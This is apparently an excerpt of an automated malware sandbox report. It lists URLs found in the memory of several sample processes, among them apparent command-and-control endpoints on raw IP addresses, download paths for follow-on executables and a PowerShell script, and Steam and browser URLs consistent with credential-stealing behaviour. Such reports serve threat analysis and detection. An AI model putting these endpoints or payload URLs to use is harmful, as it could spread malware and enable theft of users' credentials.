Source: file.exe, 00000000.00000002.2412929391.00000000010F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/;
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/=z
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/H
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php%WpO
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php-t/
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/9
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/o
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/z
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php1
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php1t#
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpF
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpO
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpV
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpYt;
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpZ
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpa
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: file.exe, 00000000.00000002.2412929391.0000000001122000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpd
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpiW
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpit
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpr
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpv
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php~
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ctionSettingsamLMEM8
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/en-US
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/icies
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/m
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/q
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/t
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.2065
Source: file.exe, 00000000.00000002.2412929391.00000000010AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206I5i
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206i
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ViewSizePreferences.SourceAumid1J
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3297166595.00000000014C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000017.00000002.3297166595.00000000014C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php?V
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpD
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpS
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpX
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpes0
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpl
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu4
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ons
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ows
Source: skotes.exe, 00000017.00000002.3297166595.000000000148B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/file1.exe?8w
Source: skotes.exe, 00000017.00000002.3297166595.000000000148B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/file1.exeJ
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/k4pDgO.ps1
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: powershell.exe, 00000019.00000002.2919340127.0000000007074000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mi/
Source: file1.exe, 00000018.00000003.2786414749.0000000001324000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797964606.0000000001323000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2853040687.000000000133D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2818361545.0000000001323000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813789486.0000000001324000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2784537176.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000019.00000002.2894050768.0000000004571000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: file.exe, file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445071785.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000019.00000002.2894050768.0000000004571000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014CF000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=16
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: 4136f86ac7.exe, 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=16964251364Z
Source: 4136f86ac7.exe, 0000001E.00000003.2929916767.0000000005604000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929730577.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=16964251364v
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3096841796.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3191846589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3095820288.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091523965.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: powershell.exe, 00000019.00000002.2938442239.000000000954F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cl.oud-cdn.de
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cl.oud-cdn.de/
Source: powershell.exe, 00000019.00000002.2938442239.000000000954F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cl.oud-cdn.de/?ch=user
Source: powershell.exe, 00000019.00000002.2938442239.000000000954F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cl.oud-cdn.de/?ch=user%7cpgkoujvbvlam
Source: powershell.exe, 00000019.00000002.2938442239.0000000009A37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cl.oud-cdn.de/?vhyneVXjVGxXWDBAHPFQ=vMcvSUhjRwUjZHoUBOuO.txt
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fa
Source: 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/
